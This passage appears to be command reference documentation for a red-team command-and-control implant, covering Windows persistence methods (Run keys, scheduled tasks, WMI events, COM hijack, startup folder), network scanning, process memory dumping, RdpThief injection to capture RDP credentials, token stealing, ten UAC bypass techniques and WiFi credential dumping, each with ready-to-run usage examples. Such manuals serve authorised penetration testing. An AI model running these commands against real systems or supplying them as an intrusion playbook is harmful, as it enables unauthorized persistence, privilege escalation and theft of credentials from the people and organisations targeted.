--command string Command to execute via the registry key
--custom_file string local file path to use as payload
--display_name string Display Name of the service (default "WinSvc")
--drop_location string File path where payload is dropped (default "C:\\Windows\\Temp\\Stay.exe")
--error_control string Service error handling (e.g., Ignore, Normal) (default "Ignore")
-h, --help print help
-f, --output_file string output file
--service_name string service_name (default "WinSvc")
--start_type string Type of service startup (default "AutoStart")
--use_malefic_as_custom_file use current session's artifact as payload
--wizard Start interactive wizard mode
SEE ALSO
persistence Junction_Folder¶
persistence
Description
Establish persistence via NTFS Junction Folder COM hijack.
Usage:
persistence Junction_Folder --dllpath "C:\payload.dll" --guid "{CLSID}" --drop_location "C:\target"
persistence Junction_Folder --artifact_name my_beacon --guid "{CLSID}"
Requires administrator privileges.
--dllpathand--guidare key parameters.
persistence Junction_Folder [arguments...] [flags]
Options
--artifact_name string artifact name to use as payload (tab-complete supported)
--custom_file string local file path to use as payload
--dllpath string dllpath
--drop_location string drop_location
--guid string guid
-h, --help print help
-f, --output_file string output file
--use_malefic_as_custom_file use current session's artifact as payload
--wizard Start interactive wizard mode
SEE ALSO
persistence NewLnk¶
persistence
Description
Create a new LNK (shortcut) file for persistence.
Usage:
persistence NewLnk --artifact_name my_beacon --filepath "C:\Users\admin\Desktop" --lnkname "Chrome" --lnkicon "C:\chrome.ico"
Creates a new shortcut file. Payload source priority:
--artifact_name>--custom_file>--use_malefic_as_custom_file.
persistence NewLnk [arguments...] [flags]
Options
--artifact_name string artifact name to use as payload (tab-complete supported)
--command string command
--custom_file string local file path to use as payload
--drop_location string drop_location
--filepath string filepath
-h, --help print help
--lnkicon string lnkicon
--lnkname string lnkname
--lnktarget string lnktarget
-f, --output_file string output file
--use_malefic_as_custom_file use current session's artifact as payload
--wizard Start interactive wizard mode
SEE ALSO
persistence Registry_Key¶
persistence via Windows Registry Key
Description
Establish persistence via a Windows Registry Run key.
Usage:
persistence Registry_Key --artifact_name my_beacon
persistence Registry_Key --custom_file /path/to/payload.exe --drop_location "C:\Windows\Temp\svc.exe"
persistence Registry_Key --use_malefic_as_custom_file --reg_key_name MyKey
Payload source priority:
--artifact_name>--custom_file>--use_malefic_as_custom_file. Default registry key:HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
persistence Registry_Key [arguments...] [flags]
Options
--artifact_name string artifact name to use as payload (tab-complete supported)
--command string Command to execute via the registry key
--custom_file string local file path to use as payload
--drop_location string File path where payload is dropped (default "C:\\Windows\\Temp\\Stay.exe")
-h, --help print help
-f, --output_file string output file
--reg_key_name string Name of the registry key to create or modify (default "WinReg")
--registry_key string Full registry key path (e.g., HKLM\Software\Microsoft\Windows\CurrentVersion\Run) (default "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run")
--use_malefic_as_custom_file use current session's artifact as payload
--wizard Start interactive wizard mode
SEE ALSO
persistence Scheduled_Task¶
persistence
Description
Establish persistence via a Windows Scheduled Task.
Usage:
persistence Scheduled_Task --artifact_name my_beacon
persistence Scheduled_Task --custom_file /path/to/payload.exe --taskname MyTask
Payload source priority:
--artifact_name>--custom_file>--use_malefic_as_custom_file.
persistence Scheduled_Task [arguments...] [flags]
Options
--artifact_name string artifact name to use as payload (tab-complete supported)
--command string Command to execute via the registry key
--custom_file string local file path to use as payload
--drop_location string File path where payload is dropped (default "C:\\Windows\\Temp\\Stay.exe")
-h, --help print help
-f, --output_file string output file
--taskname string taskname (default "WinTask")
--trigger int trigger (default 9)
--use_malefic_as_custom_file use current session's artifact as payload
--wizard Start interactive wizard mode
SEE ALSO
persistence WMI_Event¶
persistence
Description
Establish persistence via WMI Event Subscription.
Usage:
persistence WMI_Event --artifact_name my_beacon
persistence WMI_Event --custom_file /path/to/payload.exe --eventname MyEvent --attime startup
Payload source priority:
--artifact_name>--custom_file>--use_malefic_as_custom_file. Default attime: startup.
persistence WMI_Event [arguments...] [flags]
Options
--artifact_name string artifact name to use as payload (tab-complete supported)
--attime string At Time: (default "startup")
--command string Command to execute
--custom_file string local file path to use as payload
--drop_location string File path where payload is dropped (default "C:\\Windows\\Temp\\Stay.exe")
--eventname string eventname (default "WinEvent")
-h, --help print help
-f, --output_file string output file
--use_malefic_as_custom_file use current session's artifact as payload
--wizard Start interactive wizard mode
SEE ALSO
persistence reg_key¶
persistence by reg_key
Description
Establish persistence via registry Run key using BOF (writes current implant path).
Usage:
persistence reg_key
persistence reg_key --reg_key_name CustomName
Default key name: Windows_Updater. Adds current implant to HKCU Run key.
persistence reg_key [flags]
Options
-h, --help print help
-f, --output_file string output file
--reg_key_name string reg_key (default "Windows_Updater")
--wizard Start interactive wizard mode
SEE ALSO
persistence startup_folder¶
persistence via startup folder
Description
Establish persistence via the Windows startup folder.
Usage:
persistence startup_folder --artifact_name my_beacon
persistence startup_folder --custom_file /path/to/payload.exe --filename svc.exe
Payload source priority:
--artifact_name>--custom_file>--use_malefic_as_custom_file.--use_current_user_startupfolderdefaults to true (current user's startup folder).
persistence startup_folder [arguments...] [flags]
Options
--artifact_name string artifact name to use as payload (tab-complete supported)
--custom_file string local file path to use as payload
--filename string filename of executable file to be run at startup. (default "Stay.exe")
-h, --help print help
-f, --output_file string output file
--use_current_user_startupfolder use_current_user_startupfolder (default true)
--use_malefic_as_custom_file use current session's artifact as payload
--wizard Start interactive wizard mode
SEE ALSO
pingscan¶
Ping scan target
Description
Ping scan to discover live hosts.
Usage:
pingscan --target 192.168.1.0/24
pingscan --target 10.10.121.100-10.10.121.120
--targetis required. Supports CIDR and IP ranges.
pingscan [flags]
Options
-h, --help print help
-f, --output_file string output file
--target string IP or hostname(eg. 10.10.121.100-10.10.121.120,192.168.0.1/24)
--wizard Start interactive wizard mode
portscan¶
Port scan target
Description
Port scan to discover open ports on target hosts.
Usage:
portscan --target 192.168.1.1 --ports 80,443,8080
portscan --target 192.168.1.0/24 --ports 1-1000
--targetand--portsare required. Supports CIDR, IP ranges, and port ranges.
portscan [flags]
Options
-h, --help print help
-f, --output_file string output file
--ports string ports to scan (e.g., 80,443,8080 or 1-1000)
--target string IPv4 ranges and CIDR (eg. 192.168.1.128, 192.168.1.128-192.168.2.240, 192.168.1.0/24)
--wizard Start interactive wizard mode
procdump¶
Dump a process memory
Description
Dump a process memory:
procdump --pid 1234 --output-path C:\Windows\Temp\procdump.dmp
procdump [flags]
Options
-h, --help print help
-f, --output_file string output file
--output_path string output path for the dump (default "C:\\Windows\\Temp\\procdump.dmp")
--pid int process id to dump
--wizard Start interactive wizard mode
rdpthief¶
SEE ALSO
- rdpthief inject - Manually inject RdpThief into mstsc.exe process
rdpthief inject¶
Manually inject RdpThief into mstsc.exe process
Description
Manually inject RdpThief DLL into a specific mstsc.exe process.
Positional format:
rdpthief inject 1234
Flag format:
rdpthief inject --pid 1234
Steps to use:
- Find mstsc.exe process:
ps | grep mstsc - Inject into the PID:
rdpthief inject <pid> - Wait for user to enter credentials
Only supports x64 architecture. Target must be mstsc.exe process. Credentials are logged to %TEMP%\data.bin.
rdpthief inject [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--pid int PID of mstsc.exe process to inject into
--wizard Start interactive wizard mode
SEE ALSO
- rdpthief -
readfile¶
Read file content
Description
Read file content from the target using BOF.
Positional arguments format:
readfile C:\Users\admin\Desktop\secret.txt
Flag format:
readfile --filepath C:\Users\admin\Desktop\secret.txt
readfile [arguments...] [flags]
Options
--filepath string path to the file to read
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
rem_community¶
SEE ALSO
- rem_community connect - connect to rem
- rem_community fork - fork rem
- rem_community load - load rem with rem.dll
- rem_community log - get rem log
- rem_community run - run rem
- rem_community socks5 - serving socks5 with rem
- rem_community stop - stop rem
rem_community connect¶
connect to rem
Description
Connect to a REM pipeline.
Usage:
rem_community connect <pipeline_name>
First argument is the REM pipeline name.
rem_community connect [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
rem_community fork¶
fork rem
Description
Fork a REM agent with new connection parameters.
Usage:
rem_community fork <pipeline_name> <agent_id> --mod reverse --remote_url socks5://0.0.0.0:1080 --local_url tcp://127.0.0.1:8080
First argument: pipeline name. Second argument: agent ID.
rem_community fork [flags]
Options
-h, --help print help
--local_url string local_url
--mod string mod
-f, --output_file string output file
--remote_url string remote_url
--wizard Start interactive wizard mode
SEE ALSO
rem_community load¶
load rem with rem.dll
Description
Load the REM community module (rem.dll) into the current session.
Usage:
rem_community load
No arguments required. Loads the REM DLL matching the session architecture.
rem_community load [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
rem_community log¶
get rem log
Description
Get logs from a REM agent.
Usage:
rem_community log <pipeline_name> <agent_id>
First argument: pipeline name. Second argument: agent ID.
rem_community log [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
rem_community run¶
run rem
Description
Run the REM executable in the implant process.
Usage:
rem_community run --pipe <pipeline_name>
--pipespecifies the REM pipeline to connect to.
rem_community run [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--pipe string pipe
--wizard Start interactive wizard mode
SEE ALSO
rem_community socks5¶
serving socks5 with rem
Description
Start a SOCKS5 proxy through a REM pipeline.
Usage:
rem_community socks5 <pipeline_name> --port 1080 --user admin --pass secret
First argument is the REM pipeline name.
--port,--user,--passconfigure the SOCKS5 proxy.
rem_community socks5 [flags]
Options
-h, --help print help
-f, --output_file string output file
--pass string pass
--port string port
--user string user
--wizard Start interactive wizard mode
SEE ALSO
rem_community stop¶
stop rem
Description
Stop a running REM agent.
Usage:
rem_community stop <pipeline_name> <agent_id>
First argument: pipeline name. Second argument: agent ID.
rem_community stop [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
route¶
SEE ALSO
- route print - Display routing table
route print¶
Display routing table
Description
Display the system routing table.
Usage:
route print
No arguments required.
route print [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
- route -
screenshot¶
Command: situational screenshot
Description
Take a screenshot of the target's desktop.
Usage:
screenshot
screenshot --filename custom.jpg
Saves screenshot as JPEG. Default filename: screenshot.jpg.
screenshot [flags]
Options
--filename string filename to save screenshot (default "screenshot.jpg")
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
systeminfo¶
Display system information
Description
Display detailed system information including OS version, hotfixes, locale, and hardware.
Usage:
systeminfo
No arguments required.
systeminfo [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
token¶
SEE ALSO
- token make - Create impersonated token from credentials
[type] - token steal - Steal access token from a process
token make¶
Create impersonated token from credentials
Description
Create an impersonated token from given credentials:
token make --username admin --password P@ssword --domain domain.local --type 8
token make --username admin --password P@ssword --domain domain.local
Logon types:
2- Interactive3- Network4- Batch5- Service8- NetworkCleartext9- NewCredentials (default)
token make [flags]
Options
--domain string domain for token creation
-h, --help print help
-f, --output_file string output file
--password string password for token creation
--type string logon type (2-Interactive, 3-Network, 4-Batch, 5-Service, 8-NetworkCleartext, 9-NewCredentials) (default "9")
--username string username for token creation
--wizard Start interactive wizard mode
SEE ALSO
- token -
token steal¶
Steal access token from a process
Description
Steal access token from a process:
token steal 1234
token steal --pid 1234
Requires appropriate privileges to access target process. Target process must have a valid access token.
token steal [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--pid string process ID to steal token from
--wizard Start interactive wizard mode
SEE ALSO
- token -
uac-bypass¶
SEE ALSO
- uac-bypass colordataproxy - UAC bypass using ColorDataProxy technique
- uac-bypass editionupgrade - UAC bypass using EditionUpgradeManager technique
- uac-bypass elevatedcom - UAC bypass using CmstpElevatedCOM technique
- uac-bypass envbypass - UAC bypass using environment variable manipulation
- uac-bypass eventvwr - UAC bypass using Event Viewer hijack
- uac-bypass registryshell - UAC bypass using Registry Shell Command technique
- uac-bypass silentcleanup - UAC bypass using SilentCleanupWinDir technique
- uac-bypass sspi - UAC bypass using SSPI technique
- uac-bypass trustedpath - UAC bypass via fake windows directory with ComputerDefaults.exe and Secur32.dll
- uac-bypass wscript - UAC bypass using WScript hijack
uac-bypass colordataproxy¶
UAC bypass using ColorDataProxy technique
Description
UAC bypass using ColorDataProxy COM object technique via BOF.
Usage (positional argument required):
uac-bypass colordataproxy <command_to_execute>
Examples:
uac-bypass colordataproxy "C:\Windows\Temp\payload.exe"
uac-bypass colordataproxy "cmd.exe /c net user"
x64 only. Uses ICMLuaUtil COM interface via ColorDataProxy. Argument is the full command line to execute with elevated privileges.
uac-bypass colordataproxy [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
uac-bypass editionupgrade¶
UAC bypass using EditionUpgradeManager technique
Description
UAC bypass using EditionUpgradeManager COM object technique.
Usage (--command flag required):
uac-bypass editionupgrade --command <command_to_execute>
Examples:
uac-bypass editionupgrade --command "C:\Windows\Temp\payload.exe"
uac-bypass editionupgrade --command "cmd.exe /c whoami"
uac-bypass editionupgrade --command "C:\payload.exe" --use_disk_file
x64 only.
--use_disk_fileuses on-disk file variant instead of in-memory.
uac-bypass editionupgrade [flags]
Options
--command string Command to execute with elevated privileges
-h, --help print help
-f, --output_file string output file
--use_disk_file Use on-disk file variant
--wizard Start interactive wizard mode
SEE ALSO
uac-bypass elevatedcom¶
UAC bypass using CmstpElevatedCOM technique
Description
UAC bypass using CmstpElevatedCOM technique via BOF.
Usage (positional argument required):
uac-bypass elevatedcom <command_to_execute>
Examples:
uac-bypass elevatedcom "C:\Windows\Temp\payload.exe"
uac-bypass elevatedcom "cmd.exe /c whoami"
x64 only. Uses CMSTP COM object elevation. Argument is the full command line to execute with elevated privileges.
uac-bypass elevatedcom [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
uac-bypass envbypass¶
UAC bypass using environment variable manipulation
Description
UAC bypass using environment variable manipulation via PowerShell.
Usage:
uac-bypass envbypass
uac-bypass envbypass <powershell_arguments>
Examples:
uac-bypass envbypass
uac-bypass envbypass "-Command whoami"
Uses Invoke-EnvBypass.ps1 PowerShell script. Optional arguments are appended to the script invocation.
uac-bypass envbypass [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
uac-bypass eventvwr¶
UAC bypass using Event Viewer hijack
Description
UAC bypass using Event Viewer (eventvwr.msc) registry hijack via PowerShell.
Usage:
uac-bypass eventvwr
uac-bypass eventvwr <powershell_arguments>
Examples:
uac-bypass eventvwr
uac-bypass eventvwr "-Command C:\payload.exe"
Uses Invoke-EventVwrBypass.ps1. Hijacks HKCU registry to redirect eventvwr.msc handler. Optional arguments are appended to the script invocation.
uac-bypass eventvwr [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
uac-bypass registryshell¶
UAC bypass using Registry Shell Command technique
Description
UAC bypass using Registry Shell Command hijack technique via BOF.
Usage (positional argument required):
uac-bypass registryshell <command_to_execute>
Examples:
uac-bypass registryshell "C:\Windows\Temp\payload.exe"
uac-bypass registryshell "cmd.exe /c whoami"
x64 only. Hijacks shell command registry keys. Argument is the full command line to execute with elevated privileges.
uac-bypass registryshell [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
uac-bypass silentcleanup¶
UAC bypass using SilentCleanupWinDir technique
Description
UAC bypass using SilentCleanup scheduled task with environment variable manipulation.
Usage (--command flag required):
uac-bypass silentcleanup --command <command_to_execute>
Examples:
uac-bypass silentcleanup --command "C:\Windows\Temp\payload.exe"
uac-bypass silentcleanup --command "cmd.exe /c whoami"
uac-bypass silentcleanup --command "C:\payload.exe" --use_disk_file
x64 only.
--use_disk_fileuses on-disk file variant instead of in-memory.
uac-bypass silentcleanup [flags]
Options
--command string Command to execute with elevated privileges
-h, --help print help
-f, --output_file string output file
--use_disk_file Use on-disk file variant
--wizard Start interactive wizard mode
SEE ALSO
uac-bypass sspi¶
UAC bypass using SSPI technique
Description
UAC bypass using SSPI datagram context technique via BOF.
Usage (positional argument required):
uac-bypass sspi <command_to_execute>
Examples:
uac-bypass sspi "C:\Windows\Temp\payload.exe"
uac-bypass sspi "cmd.exe /c whoami"
x64 only. Uses SSPI datagram context for elevation. Argument is the full command line to execute with elevated privileges.
uac-bypass sspi [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
uac-bypass trustedpath¶
UAC bypass via fake windows directory with ComputerDefaults.exe and Secur32.dll
Description
UAC bypass via fake Windows directory with ComputerDefaults.exe and Secur32.dll hijacking.
Examples:
uac-bypass trustedpath --local_dll_file C:\path\to\your\malicious.dll
Requirements: x64 architecture only. Valid DLL file for hijacking. Windows 10/11 compatible.
uac-bypass trustedpath [flags]
Options
-h, --help print help
--local_dll_file string Full path to the DLL file to be executed
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
uac-bypass wscript¶
UAC bypass using WScript hijack
Description
UAC bypass using WScript.exe DLL hijack via PowerShell.
Usage:
uac-bypass wscript
uac-bypass wscript <powershell_arguments>
Examples:
uac-bypass wscript
uac-bypass wscript "-Command C:\payload.exe"
Uses Invoke-WScriptBypassUAC.ps1. Optional arguments are appended to the script invocation.
uac-bypass wscript [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
wifi¶
SEE ALSO
wifi dump¶
Dump WiFi profile credentials
Description
Positional arguments format:
wifi dump "My WiFi Network"
wifi dump MyWiFi
Flag format:
wifi dump --profilename "My WiFi Network"
wifi dump --profilename MyWiFi
wifi dump [arguments...] [flags]
Options
-h, --help print help
-f, --output_file string output file
--profilename string WiFi profile name to dump
--wizard Start interactive wizard mode
SEE ALSO
- wifi -
wifi enum¶
Enumerate WiFi profiles
Description
Enumerate all saved WiFi profiles on the target.
Usage:
wifi enum
No arguments required. Lists all saved wireless profiles.
wifi enum [flags]
Options
-h, --help print help
-f, --output_file string output file
--wizard Start interactive wizard mode
SEE ALSO
- wifi -